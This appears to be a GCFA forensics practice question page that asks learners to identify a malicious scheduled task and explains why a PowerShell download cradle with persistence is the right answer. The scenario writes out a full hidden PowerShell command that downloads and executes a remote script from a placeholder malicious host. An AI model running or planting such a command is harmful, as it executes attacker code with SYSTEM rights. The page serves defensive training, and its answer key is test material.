Courseiva

GCFA Practice Question: Identification of Malicious and Normal Activity

A security analyst is examining a Windows 10 system and finds a scheduled task named 'Updater' that runs 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"' every hour. The task is configured to run under the SYSTEM account. Which of the following best describes the malicious technique being used?

⚠ Common exam trap

The trap here is focusing on the scheduled task or the PowerShell parameters as the primary technique, when the core malicious action is the download and in-memory execution of a remote payload via a download cradle.

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

The scheduled task is using a PowerShell download cradle to retrieve and execute a remote payload, which is a common fileless malware technique.

The command uses Invoke-Expression to download and execute a PowerShell script from a remote URL, which is a download cradle. This allows the attacker to run arbitrary code without writing it to disk, making it fileless. The scheduled task provides persistence, running the command hourly as SYSTEM. This combination is a common malware technique.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✗

    The scheduled task is using a PowerShell logging bypass to avoid detection, which is a common defense evasion technique.

    Why it's wrong here

    The -Exec Bypass parameter bypasses the execution policy, not logging. PowerShell logging (e.g., script block logging) can still capture the command unless explicitly disabled via other means. The primary technique here is the download and execution of a remote payload, not logging bypass. While evasion is a component, it is not the best description of the overall technique.

  • ✗

    The scheduled task is using a PowerShell profile script to maintain persistence, which is a common technique for surviving reboots.

    Why it's wrong here

    A PowerShell profile script is a script that runs automatically when PowerShell starts. This command does not reference a profile; it uses a download cradle. While scheduled tasks themselves provide persistence, the technique described is not profile-based. The use of a scheduled task is the persistence mechanism, but the command is a download cradle.

  • ✓

    The scheduled task is using a PowerShell download cradle to retrieve and execute a remote payload, which is a common fileless malware technique.

    Why this is correct

    The command uses IEX (Invoke-Expression) to download and execute a PowerShell script from a remote URL. This is known as a download cradle and is a classic fileless malware technique because the payload is not written to disk. The use of -W Hidden and -Exec Bypass further indicates an attempt to evade detection. Scheduled tasks are often used for persistence.

  • ✗

    The scheduled task is using a PowerShell remoting command to execute a script on a remote system, which is a common lateral movement technique.

    Why it's wrong here

    PowerShell remoting typically uses commands like Invoke-Command or Enter-PSSession, not a download cradle. The command here downloads and executes a script locally, not on a remote system. While lateral movement could involve downloading payloads, this specific command does not indicate remoting; it indicates local execution of a remote payload.

About these practice questions

This GCFA question is part of Courseiva's 292-question bank — original exam-style content with full explanations and wrong-answer analysis, never real exam questions or exam dumps. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written and reviewed by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

Last reviewed September 2026 · checked against the official GIAC exam blueprint

This GCFA practice question is part of Courseiva's free GIAC certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the GCFA exam.